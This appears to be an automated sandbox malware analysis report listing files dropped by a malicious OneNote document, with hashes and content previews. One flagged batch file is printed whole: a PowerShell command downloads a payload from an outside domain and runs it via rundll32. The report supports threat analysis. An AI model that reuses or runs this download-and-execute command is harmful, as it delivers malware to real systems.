                                                                                                                                                                                  file.exeGet hashmaliciousBrowse
                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousBrowse
                                                                                                                                                                                        RS9009.imgGet hashmaliciousBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousBrowse
                                                                                                                                                                                              Grant#2929.htmlGet hashmaliciousBrowse
                                                                                                                                                                                                file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                  RFSL#6617.imgGet hashmaliciousBrowse
                                                                                                                                                                                                    file.exeGet hashmaliciousBrowse
                                                                                                                                                                                                      dBDfcVVkIk.exeGet hashmaliciousBrowse
                                                                                                                                                                                                        l39HA25qjw.exeGet hashmaliciousBrowse
                                                                                                                                                                                                          C:\ProgramData\putty.jpgDocument.oneGet hashmaliciousBrowse
                                                                                                                                                                                                            notes.oneGet hashmaliciousBrowse
                                                                                                                                                                                                              Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):172
                                                                                                                                                                                                              Entropy (8bit):5.203658415159377
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:2EKDDGKSSJJFsLTzTH3x8J3k40sQCALTiV2qKMJAFm7zBJTTeJ6Fk9zBJTKyMORr:0SGYzLh8Jn0tLTiVNKMdXzTeJ62Jzp99
                                                                                                                                                                                                              MD5:04F7EB9BA360CBDAF30084F4289C0516
                                                                                                                                                                                                              SHA1:5D7F95435941CFDE34A261ADC5C495884EC3B09F
                                                                                                                                                                                                              SHA-256:88C5CB7BC6597CF1CB5B16114685495583DD10094A547C84FD9069306659238B
                                                                                                                                                                                                              SHA-512:E726C92D7791E95A348F2FCF93A67CD1E6D5A5B104F0E74E9A9E0223E2CDFF508C28B65D3ADE1CD9FFEA5244E565FF0AD5EAF9C9A8610933340B1D0096A31EBF
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Preview:..@echo off..powershell Invoke-WebRequest -URI https://tassoinmobiliaria.com/56G0/01.gif -OutFile C:\programdata\putty.jpg..rundll32 C:\programdata\putty.jpg,Wind..exit....
                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.468703571312251
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:M4UU1kJLZevpB01M45B7rvAHl1uaL2JZ3KeopG3YxDgglBdN:KWX23zMG3YxBdN
                                                                                                                                                                                                              MD5:4FA7084A034DD4E84D5F567476AA9FBB
                                                                                                                                                                                                              SHA1:7E8C974A7C1F54D6C18F24C617DFE29BAFD6ED26
                                                                                                                                                                                                              SHA-256:F716C2324C1E7DEFED9B822F543156934C3534EEDC9EF1E69FC3745733C5DCB7
                                                                                                                                                                                                              SHA-512:BE1E937B3E6CB6A961BE6BE342FD839C41941FB8EDFA7CD1A329FC0434FD817D5427A431B8E0AE7E757F5C409B08447BAB4358E0F2437189F9577D2DE3B2335A
                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                              • Filename: Document.one, Detection: malicious, Browse
                                                                                                                                                                                                              • Filename: notes.one, Detection: malicious, Browse
                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#..... ...................0....4i......................................@... .........................5.......................................\...................................................................................text...4........ ..................`.P`.data........0.......$..............@.`..rdata...u...@...v...&..............@.`@.bss..................................`..edata..5...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls....s...........................@.0..reloc..\............\..............@.0B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):153877
                                                                                                                                                                                                              Entropy (8bit):5.353859533263984
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:q+C7/gjDB6B9guwULQ9DQN+zezQKk4F77nXmvid8XR3EwrNz6I:jmQ9DQN+zezIX+g
                                                                                                                                                                                                              MD5:DBAB839E2509CB831BCAC678670CC1B4
                                                                                                                                                                                                              SHA1:B77B6CDE4CF2D5A57849E909A66A51C3D8EC5DE1
                                                                                                                                                                                                              SHA-256:A1249121A890714E9813D166CD2FC63C23785707183A88BD214B6D84C9F7329D
                                                                                                                                                                                                              SHA-512:4A8124048A6F9B6897129EB0B38CD1AB5AFD9297768BF3E6D9DBA60A9F1CF83B861B764B7E97AFCEF727BE35A56B809CE48D3DE10EBBBB942DF2359BBA18A12A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2023-02-07T18:48:24">.. Build: 16.0.16130.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):289664
                                                                                                                                                                                                              Entropy (8bit):5.151340981300995
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:42/zodZIr6KPZ01u6uSivsUQK75IthMfK2Xua:Vrr6KPZ01u6uSivsUQK75IthQXN
                                                                                                                                                                                                              MD5:9C1A32F9C78C1998FD5E8CC83A9F2593
                                                                                                                                                                                                              SHA1:470AD5B6F44DA93A3632D4DA24DAEC72C3DE23F8
                                                                                                                                                                                                              SHA-256:67C716256C7FC67D6AA08DFB2FADF131874D0740771789D71744C45824327CD2
                                                                                                                                                                                                              SHA-512:190E7991DC9348ED2AA2F9DBF01CD3844040147D9B84316761CF6332F17A7F40FB0A0A7338660EEBD2FF2FAD7DD90EA6A9268B85E675562DFE901E3673FA427B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?><Rules xmlns="urn:Rules"><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU" xmlns=""><S><Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" /><F T="2"><O T="AND"><L><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="37" T="U32" /></R></O></L><R><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="29" T="U32" /></R></O></R></O></F><TI T="3" I="10min" /><A T="4" E="TelemetrySuspend" /><A T="5" E="TelemetryShutdown" /></S><G I="true" R="TriggerOldest"><S T="2"><F N="RuleID" /><F N="RuleVersion" /><F N="Warning" /><F N="Info" /></S></G><C T="U32" I="0" O="false" N="ErrorCount"><C><S T="2" /></C></C><C T="U32" I="1" O="false" N="ErrorRuleId"><S T="2" F="RuleID" /></C><C T="U16" I="2" O="false" N="ErrorRuleVersion"><S T="2" F="RuleVersion" /></C><C T="U8" I="3" O="false" N="WarningInfo"><S T="2"
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3023002, writer version 2, read version 2, file counter 2, database pages 1, cookie 0, schema 0, largest root page 1, unknown 0 encoding, version-valid-for 2
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):0.09216609452072291
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:lSWFN3l/klslpF/4llfll:l9F8E0/
                                                                                                                                                                                                              MD5:F138A66469C10D5761C6CBB36F2163C3
                                                                                                                                                                                                              SHA1:EEA136206474280549586923B7A4A3C6D5DB1E25
                                                                                                                                                                                                              SHA-256:C712D6C7A60F170A0C6C5EC768D962C58B1F59A2D417E98C7C528A037C427AB6
                                                                                                                                                                                                              SHA-512:9D25F943B6137DD2981EE75D57BAF3A9E0EE27EEA2DF19591D580F02EC8520D837B8E419A8B1EB7197614A3C6D8793C56EBC848C38295ADA23C31273DAA302D9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:SQLite format 3......@ .......................................................................... .....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:SQLite Rollback Journal
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4616
                                                                                                                                                                                                              Entropy (8bit):0.13760166725504608
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:7FEG2l+08El/FllkpMRgSWbNFl/sl+ltlslVlllfll28n:7+/lLpg9bNFlEs1EP/m8
                                                                                                                                                                                                              MD5:0C5740411C8EF0BD7E2079713957EAD8
                                                                                                                                                                                                              SHA1:AA0C80BB76E5867078860FB5CB48A4501FF2B5C3
                                                                                                                                                                                                              SHA-256:04CC8C03FF3557539A144FDBEEA58B8770CCB68DABCF5B38F06F5E9B9D5FE40E
                                                                                                                                                                                                              SHA-512:F6D52348BF71C12A3F94B389954FBEF2CC986AC68E8CD5B8A22666CCE5EDD3574CA11D5A1F97885E8A10190C19B30D200CD0D32E5E96EC41228387EFD3C8F9EE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.... .c......j......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................SQLite format 3......@ .......................................................................... .................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                              Entropy (8bit):0.04482848510499482
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3:G4l2ji/BeBXDWiCl2ji/BeBXDWX/WlL9//Xlvlll1lllwlvlllglbXdbllAlldla:G4l2e5KzRCl2e5KzDL9XXPH4l942U
                                                                                                                                                                                                              MD5:6B3D099885155C797129E25AFB8D18BD
                                                                                                                                                                                                              SHA1:5BA88E4E55605EAABF2260F8E55CD510FE844F36
                                                                                                                                                                                                              SHA-256:9EEF6024865D9D33FABC58F6F9B8BAEE0CD5070A51FDC96353564A348E754E30
                                                                                                                                                                                                              SHA-512:C1319D55E6474D6F0016C3668B6938CEBF8E66594F28E1994184ECCED7C0963C7A3862BE05E2F587AE259B51FAA9109E839E77FFC0C464EBAA374A386A863F35
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:..-........................[..4..b.;...=w.Dd.Vs..-........................[..4..b.;...=w.Dd.Vs........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):45352
                                                                                                                                                                                                              Entropy (8bit):0.3954969390255552
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:K6ZP+X6Q3zRDGsUll7DBtDi4kZERDAzqt8VtbDBtDi4kZERD9U:B+X6Q1ysUll7DYMczO8VFDYMp
                                                                                                                                                                                                              MD5:38F85112EB9EB3723AAEA1A15E3439C6
                                                                                                                                                                                                              SHA1:EF278868C8F9589145CBFD03A0C1897A9B73282E
                                                                                                                                                                                                              SHA-256:85F348662C6F327C0726282C1031EEEEED896B77C50052BA7EC2B4BDB1CE5413
                                                                                                                                                                                                              SHA-512:029C1A4496F48B93F87110641B2E114BF1B0D7DAF580EEE3D2D0E7FA5F4BF8D61C9C5F50934AF63A263682555359FF9012DEC9972B93E0FC69135889A25EC0F5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:7....-...........b.;.....e.|`...........b.;....!l....SQLite format 3......@ .......................................................................... .............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5272
                                                                                                                                                                                                              Entropy (8bit):1.2918100391698801
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:U7Yyfnj/UPBsnlFFFBtMVstO/B+p3IvpvyoT+X+C:U7YyfnYq3tOstG+KvpqoKF
                                                                                                                                                                                                              MD5:D43C12514B634408CF7D8D69616208FE
                                                                                                                                                                                                              SHA1:C7D411BBBB18A0A5C9625EABE59259DEE45338FE
                                                                                                                                                                                                              SHA-256:E5F728BE77E0C53AA7C620D62E9917DF25DAECBF338569394222AAB0CE2D6E9D
                                                                                                                                                                                                              SHA-512:38C03D40791630F04194D00D5BFEF2E799F18F87D66E6E43E0E80AA400EF88848057E28EBA42FE862D8BD88E19E677B011B868C11D75AF3DB3DAFEF21718FAD6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.R\{..M..Sx.)...W|...B..1.0+..................?.....I.......*...*...*...*...........................................................................................h...........................................4../a.,B.,..]X.............<..F.`..d.)............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):5272
                                                                                                                                                                                                              Entropy (8bit):1.2918100391698801
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:U7Yyfnj/UPBsnlFFFBtMVstO/B+p3IvpvyoT+X+C:U7YyfnYq3tOstG+KvpqoKF
                                                                                                                                                                                                              MD5:D43C12514B634408CF7D8D69616208FE
                                                                                                                                                                                                              SHA1:C7D411BBBB18A0A5C9625EABE59259DEE45338FE
                                                                                                                                                                                                              SHA-256:E5F728BE77E0C53AA7C620D62E9917DF25DAECBF338569394222AAB0CE2D6E9D
                                                                                                                                                                                                              SHA-512:38C03D40791630F04194D00D5BFEF2E799F18F87D66E6E43E0E80AA400EF88848057E28EBA42FE862D8BD88E19E677B011B868C11D75AF3DB3DAFEF21718FAD6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.R\{..M..Sx.)...W|...B..1.0+..................?.....I.......*...*...*...*...........................................................................................h...........................................4../a.,B.,..]X.............<..F.`..d.)............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):108872
                                                                                                                                                                                                              Entropy (8bit):7.42949351384423
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:j2cvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7+2x0R6Za:ycgS2EJbyYeMYkKkyX3DWvLLATicRga
                                                                                                                                                                                                              MD5:EFEA16F8FF499DE8601EDF598FB71617
                                                                                                                                                                                                              SHA1:6D17E784B82EA812D74739BF665D2D886C687997
                                                                                                                                                                                                              SHA-256:031526ADAA66ACF45CC84973C26B07A5BC8B14C38B158E21C7472EEEAE173E20
                                                                                                                                                                                                              SHA-512:DAD4909A9EE67B63C5C088904372D61374809620B361F913E9C3F926D018110D67439B0167251FE0EA393F0E347E1809E315FD657B4D32C2DFA6130016FB4335
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.R\{..M..Sx.)..v7;..C..p.#...................?.....I.......*...*...*...*........................................................................&..................h...........................H.......`..............D........!............L.g:o.\{............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):108872
                                                                                                                                                                                                              Entropy (8bit):7.42949351384423
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:j2cvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7+2x0R6Za:ycgS2EJbyYeMYkKkyX3DWvLLATicRga
                                                                                                                                                                                                              MD5:EFEA16F8FF499DE8601EDF598FB71617
                                                                                                                                                                                                              SHA1:6D17E784B82EA812D74739BF665D2D886C687997
                                                                                                                                                                                                              SHA-256:031526ADAA66ACF45CC84973C26B07A5BC8B14C38B158E21C7472EEEAE173E20
                                                                                                                                                                                                              SHA-512:DAD4909A9EE67B63C5C088904372D61374809620B361F913E9C3F926D018110D67439B0167251FE0EA393F0E347E1809E315FD657B4D32C2DFA6130016FB4335
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.R\{..M..Sx.)..v7;..C..p.#...................?.....I.......*...*...*...*........................................................................&..................h...........................H.......`..............D........!............L.g:o.\{............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                                              Entropy (8bit):4.758135109297807
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:LPNLjdwWNtzafOJHzI6rrPikDRU/96QXzTdnz+duE0tjmzk1NyZb:LPNLZw6pa25Iyrq4Uzzpz+dN0tjLN0b
                                                                                                                                                                                                              MD5:A2F959915A29D85D6D6B8ED1EE975495
                                                                                                                                                                                                              SHA1:58E249A272753BAD7C230EDCD3F4D092830F00A3
                                                                                                                                                                                                              SHA-256:6D371D355A9C938A6C438BA617E1462F807CAA42DE48A69236E75B3F44355B07
                                                                                                                                                                                                              SHA-512:8A7932D59B831F4F63FFF1F7963BEF96DC529B668FB31840CFD20A071A91B64CA62733E07D2CBB3B153307E2CAAA9E45113D3A41D11F4F00BB6D3CC6A80FA5A5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....8..@....j.s.R...&..ug..........;.H.......................@X...j.s.R...&..ug......................................X.......0.......p...P...........X............?..........................~....................?.............. ...F..@ef....$.4..............X.CC..8.!..B........t....?...=....m;.H....7.5N....{.i.6.&L.w.........?....................x...................<..........................................................................................b>.....@....._=....E.v|>/UNK...........................................@....j.s.R...&..ug............`.z@..#..a................X.......0.......p...P...............................`...................&5...1......48.;.".E......G.......Zs{K.F.2..{........?...4..........d?2.>..G.....".p............................Vz..w..G.".j..8...........m;.H....7.5N...........@........ef....$.4...............?..................t......@~.......X.CC..8.!..B.................?...............@..$>....m;.H....7.5N....{.i.6.&L.w..............>.....@
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32768
                                                                                                                                                                                                              Entropy (8bit):5.386028245708025
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:20dv571PDWa+0sXsa75Qy6D6/hc/7fNNLQ6VN7lb+DfkvEACQwPG6Z:bhT+VL5r6ihcLzLQ6i4gG6
                                                                                                                                                                                                              MD5:EAF7634F7678D8E8511FC712D6A2A056
                                                                                                                                                                                                              SHA1:CB55E3EFBEE7D723D217BBE51F6A4131E19FA423
                                                                                                                                                                                                              SHA-256:BDE70CCAC301DD7F904D97FA2A2E3FAF143BD677F1E808B797AF0A55903B5D59
                                                                                                                                                                                                              SHA-512:7803C91843EF1BF1E83C5D88D37D77FA8EDAF2E8B31913B015E1FFCD4FF093969D63D2F9CFB9A03EDC9F3EF3817D2A533788B87C1EC289DB2E216DE48BF6665E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....................j................=...Y...:.........@...@.....$...,.......B..`H....................4@..B&. . ........s.....K.Z.G.A.......................................................................................................................?...?..............<............................................................................................................?...?..............~..@....r...._..R'WD..X.5'K......Op.b..F.$..i........_..x...j...4....K.} ].G.U...-......s.....K.Z.G.A......i.......t..........."..@h...+..D.".c.{i....[2sN...K..Y.)...........d......@\....Op.b..F.$..i........X.....C..p.'..........L...........^_.p.yYB.....#........................................@...N.?I.LC.J..+.....Op.b..F.$..i...........t......@4...h...+..D.".c.{i....s.....K.Z.G.A.......?..4..@t...V....R.X..LL.s.$..q.......m..M..u.........b..F.$..i...............(...4.....sR.QxI.o..Y.z>....s.....K.Z.G.A......).............J.i..K.y.R.MC.......F....Q...[.d.....4...V8O.<.!........==..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):2.3866630770867325
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:R9i1Dw9eSe51zN6W+UTdrLLJ/VyDioHvma/7eSq1UPhgllRE+1:3yDMqph+UTdLqvdpaUPYRE
                                                                                                                                                                                                              MD5:8A3FD8539047AAD2F542993F755CE206
                                                                                                                                                                                                              SHA1:4C06AD18AE8581C19E0D5C5FEC9F96E3562DDEE7
                                                                                                                                                                                                              SHA-256:15776C55BC2897AEDB3B262C94818D39D4685EDB3D944B0D274AC71311810348
                                                                                                                                                                                                              SHA-512:A262DA793676354E2C8ABA86C7437694DEFC8BB5A0C35D0E2177CCEBA4BB40B0E2C05D287767109AFB032D679409D43315DACD195E25F673D5556DFF55F64909
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:j...>.......................................................................................................................................................................0...j...>...^...........v..............[v.^.....`k`.^.......^......B....2.2.os-.....;.XC...os-....[v.^.....`k`.....^......B....2.2.^.......................................................................os-.....os-.....;.XC...^.......^......B....2.2.2...^.................................................................).....X.'......."..^..T.,......................................^.......os-..c..,0...e...B4.$.........|..tQ&G...%QE.3...%.:...........................4..(...(...............0...e... ..$.....m.....A.`q1.... .}..:..................0............4..e....5..b4............T-Do..-A...Q'.1.....(...(......%.:......5|.....J.ID".U.O........;.5....@...h.NG.....N...z...........................................................................................................;.5....@...h.NG.............................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                                                              Entropy (8bit):4.3544543042718
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:ectYzCt9SrbdO2MuptXQHZx5tFHO8xBwGy8OR2OCoOtYDSYZ8H2mtX4trLO6A6K:eMYuSrbMoXQHLD//0v4oPZQfXZ
                                                                                                                                                                                                              MD5:9629B6792EE358291620BFF8776097F6
                                                                                                                                                                                                              SHA1:6FF31914E603A2537153DFBB9D6E42DFCAA3F984
                                                                                                                                                                                                              SHA-256:13FDEB3780453A2C7A118B923C871548051F3FA794BE8C875E050218F21BFC66
                                                                                                                                                                                                              SHA-512:6644275C156100388F96F9D7E536C4EC4ACC513A2CB9FF303C27645825FD77D210B47B3D87254C69674FF8B1ECADDAEFF2654C30F33DCCF87AC608F821DF8341
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....$.......................................................................................................................................................$...........................................................x.................C=8.O...a;@f..-...-...)9.....-.......(.#..).0.Q.u....{.i.6.&L.w.....{.i...........................................................................5......-......G.)9...............................................................................-..P....-..P*i..-..d.]..-..`.T..........5H.G.#F......\....h.....................................`.{.i.........................-.......-......G.)9..............C=8.O...a;@fc.......`.......`...................................................`..J....`d.1....`N.:....`N.H....................................................4..(...(.....{.i.....{.i.6.&L.w..............C=8.O...a;@f.2...........&.....................`.{.i.......................................c..,..................$...........t...................(.#I
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):4.208305094975494
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:oiGMa0iKOmvokO2brRj0hVkeTkSR6Cd2r9mPFTjxu1v2tMCoj+Aka1wqgctqcXkI:o1B0Sxk7brkVLvRGrEFxw+AYcBgUaw
                                                                                                                                                                                                              MD5:5526D81FBD69F35E450996E000B22795
                                                                                                                                                                                                              SHA1:156E799D9B9F4C7744F5B45E0935CE23024D94B9
                                                                                                                                                                                                              SHA-256:780AACE48801B6678BDEE219D8874A9B2A7710D3ED255868F73F41A2AA2D148B
                                                                                                                                                                                                              SHA-512:A0DD99D8D9CC4BD65A5EA162A9EC27DD8E8C2CDD67265B7B96744541F26124AADE6DCA17D900290EEE1ED72A72B5EE97C34EFCB8079622AA5BBF539C79A75085
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:6......@........4.................................?.....?......?....?...................................................................................................0.......9j......9j.G.c.G.G..L.?...4.......4Y....p...........x.......x....15.K1B...$...Q.q.h.....9j.....SF.i...e...T,....9j.G.c.G.G..L.?69j.............................................................................5......-......G.)9................................................................................ ....... .......m.2LI2............SF.iE..e...T,........J...p.....$.v5?.....h..(12..q..C.....KH.9j.G.c.G.G..L.?6. .......m.2LI2.. ....$.v5?.....h..(..$.12..q..C.....KH.12.............Q.......Q.................................................9j...>..9j.\.H..9j...I....................................................4..~...1...(...(...<...O.n.e.N.o.t.e. .N.o.t.e.b.o.o.k.s.\.M.y. .N.o.t.e.b.o.o.k.......M.y. .N.o.t.e.b.o.o.k.........9j......9j.G.c.G.G..L.?6t.e.b.o.o.k.....2...&............. ...c..,........Q.q.h......9j.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):1.2765482351087298
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:JYqdCceZhvR//esvUtlE4zOOwhkMFT3k1lMXNadNd4yeZG/i9:qCCceZpJ/eXtlvbwSB1gNadNd4yeE/
                                                                                                                                                                                                              MD5:8D0512D82D3100D69FF91892326A5F4B
                                                                                                                                                                                                              SHA1:BA28A646812CFFB96B107D695E7E69376D18A848
                                                                                                                                                                                                              SHA-256:924FA25617EE40A6C5AADDCFBB9F7B18B87919241526EDB2424ECE49CE096667
                                                                                                                                                                                                              SHA-512:694935514FB5B8CAE0F0B28FE3901F91BBB4E54DFD489B0B578122DA6F4F58072713E5301DAF1EF8865397BA5C6F970E3F8D825B4D0E724E90D3BF02693BADFA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....>...........x....................?...................................................................................................................................................................2.......2.B0..O..:..(..............L.J.1<?..(.j.s.R...&..ug..j.s.....L.J.1<?..(......2.B0..O..:..(...2.............................................................................5......-......G.)9................................................................................1..p.AC..Z....c....h...N................c..[.E..).<...............................................................................c..[.E..).<...........1..p.AC..Z....c..........2.......2...................................................2...C...2.`.1...2...F....................................................4..~...1...(...(.......O.p.e.n. .S.e.c.t.i.o.n.s.......O.p.e.n. .S.e.c.t.i.o.n.s...........1.......O.p.e.n. .S.e.c.t.i.o.n.s.........j.s.....j.s.R...&..ug..............L.J.1<?..(.2.......................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
